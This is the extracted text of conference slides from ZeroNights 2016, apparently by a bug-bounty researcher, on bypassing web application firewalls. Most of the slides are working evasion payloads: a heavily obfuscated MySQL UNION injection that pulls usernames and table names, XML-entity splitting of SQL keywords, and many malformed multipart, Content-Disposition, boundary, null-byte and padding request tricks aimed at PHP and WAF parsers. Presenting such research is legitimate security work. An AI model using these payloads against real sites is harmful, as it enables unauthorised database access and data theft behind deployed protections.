There are regular and smart firewalls. The regular ones are quite clear, it was a good report on the latest Black Hat. However, we need a completely different approach to come round advanced protection. Есть фаерволы на регулярных выражениях, а есть умные. Если с первыми все понятно — был отличный доклад на последнем Black Hat, то чтобы обойти современную защиту, нужно иметь совершенно другой подход!

1. ZeroNights 2016

2. Whoami
Anton “Bo0oM” Lopanitsyn
● security researcher
● whitehat
● bug bounty practicant
● JBFC member

6. Types of bypasses
Protocol
parsing
(HTTP,
WS, ...) Data parsers
(Base64, XML,
JSON, ...)
Detection
logic

7. Detection logic, bla-bla-bla
1 UNION select@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO $ fRom(SeLEct@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO
frOM`information_schema`.`triggers`)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO WHere
!FAlSE||tRue&&FalSe||FalsE&&TrUE like TruE||FalSE
union/*!98765select@000OO0O0OooOoO0OOoooOOoOooo0o0o:=grOup_cONcaT(`username`)``from(users)whErE(username)li
ke'admin'limit 1*/select@000OO0O0OooOoO0OOoooO0oOooo0o0o limit 1,0 UnION
SeleCt(selEct(sELecT/*!67890sELect@000OO0O0O0oOoO0OOoooOOoOooo0o0o:=group_concat(`table_name`)FrOM
information_schema.statistics WhERE TABLe_SCHEmA
In(database())*//*!@000OO0O0OooOoO0OOoooO0oOooo0o0o:=gROup_conCat(/*!taBLe_naME)*/fRoM
information_schema.partitions where TABLe_SCHEma not in(concat((select insert(insert((select
(collation_name)from(information_schema.collations)where(id)=true+true),true,floor(pi()),trim(version()from
(@@version))),floor(pi()),ceil(pi()*pi()),space(0))), conv((125364/(true-!true))-42351,
ceil(pi()*pi()),floor(pow(pi(),pi()))),mid(aes_decrypt(aes_encrypt(0x6175746F6D6174696F6E,0x4C696768744F53)
,0x4C696768744F53)FROM floor(version()) FOR
ceil(version())),rpad(reverse(lpad(collation(user()),ceil(pi())--@@log_bin,0x00)),!
!true,0x00),CHAR((ceil(pi())+!false)*ceil((pi()+ceil(pi()))*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--
cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--ceil(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-
cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--floor(pi()*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-
floor(pi()))),0x6d7973716c))from(select--
(select~0x7))0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO)from(select@/*!/*!$*/from(select+3.``)000oOOO0Oo0OOooOooOoO00
Oooo0o0oO)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO/*!76799sElect@000OO0O0OooOoO00Oooo0OoOooo0o0o:=group_concat(`use
r`)``from`mysql.user`WHeRe(user)=0x726f6f74*/#(SeLECT@ uNioN sElEcT AlL group_concat(cOLumN_nAME,1,1)FroM
InFoRMaTioN_ScHemA.COLUMNS where taBle_scHema not
in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c)UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO UNION
SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO UNION SELECT@000OO0O0OooOoO0OOoooO0oOooo0o0oOO UNION
SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO)

8. Data parsers
<?xml version="1.0" encoding="utf-8"?>
<bla></bla>
<data>&lt;?xml version="1.0" encoding="utf-
8"&gt;&lt;!ENTITY XXE
Attack&gt;&lt;bla&gt;&lt;/bla&gt;</data>
<bla></bla>

9. Data parsers
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY a "UNI">
<!ENTITY b "SELE">
<!ENTITY c "pass">
<!ENTITY d "FR">
<!ENTITY e "admins">
<!ENTITY f "WHE">
<authorid>-1 OR &a;ON &b;CT &c;wd &d;OM &e;
&f;RE id=1</authorid>

10. HTTP requests & HTTP parsers

11. Content-type: multipart/form-data, boundary=AaB03x
--AaB03x
content-disposition: form-data; name="field1"
Joe Blow
--AaB03x
content-disposition: form-data; name="pics"; filename="file1.txt"
Content-Type: text/plain
... contents of file1.txt ...
--AaB03x--
Multipart

12. POST /hello HTTP/1.1
Content-Type: application/x-www-form-urlencoded
param=Attack
POST /hello HTTP/1.1
Content-type: multipart/form-data, boundary=AaB03x
--AaB03x
content-disposition: form-data; name="param"
Attack

13. Content-Disposition: form-data; name="param"text"text"'test';
Content-Disposition: form-data; name=”param
Content-Disposition: form-data; name=param
Content-Disposition: attachment; name=param
Content-Disposition: name=param
Content-disposition trick

14. Content-Disposition:
attachment;
name
=
param
Attack!
Content-Disposition tricks

16. POST / HTTP/1.1
Content-Type: multipart/form-data; boundary
Content-Type: multipart/form-data; boundary=Test
Content-Type: multipart/form-data; boundary
--Test
Content-Disposition: form-data; name=param
Attack
Headers tricks

17. POST / HTTP/1.1
Content-Type: multipart/form-data; boundary
Content-Type: multipart/form-data; boundary=
Content-Type: multipart/form-data; boundary
--
Content-Disposition: form-data; name=param
Attack
Headers tricks

18. Headers tricks. RFC? What is RFC?
POST / HTTP/1.1
Content-Type: multipart/form-data; xxxboundaryxxx=Test;
boundary=hello;
--Test
Content-Disposition: form-data; name=param
Attack

20. Content-Type: multipart/form-data; boundary=gg
Content-Type: multipart/form-data; boundary=ggg
Content-Type: multipart/form-data; boundary=gg
Content-Type: multipart/form-data; boundary=ggg
Content-Type: multipart/form-data; boundary=ggg
Content-Type: multipart/form-data; boundary=!ggg

21. Content-Encoding: gzip
HTTP compression
Previous tricks ;)

24. PHP + %00

25. PHP <3
POST /phpmustdie.php HTTP/1.1
Content-Type: multipart/form-data;
boundary=Testx00othertext;
--Test
Content-Disposition: form-data; name=param
Attack

26. PHP <3
POST /phpmustdie.php HTTP/1.1
Content-Type: multipart/form-data; boundary=Test;
--Testx00othertext
Content-Disposition: form-data; name=param
Attack

27. PHP <3
POST /phpmustdie.php HTTP/1.1
Content-Type: multipart/form-data; boundary=Test;
--Test
Content-Disposition: form-data; name=param
Attackx00othertext

28. POST /hello HTTP/1.1
Foo: bar
Foo: bar
...
Foo: bar
Foo: bar
Content-Type: application/x-www-form-urlencoded
param=Attack

29. POST /hello HTTP/1.1
Content-Type: application/x-www-form-urlencoded
param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A*(8kb)’ union select from ...

31. Anton “Bo0oM” Lopanitsyn
https://bo0om.ru
i@bo0om.ru
@i_bo0om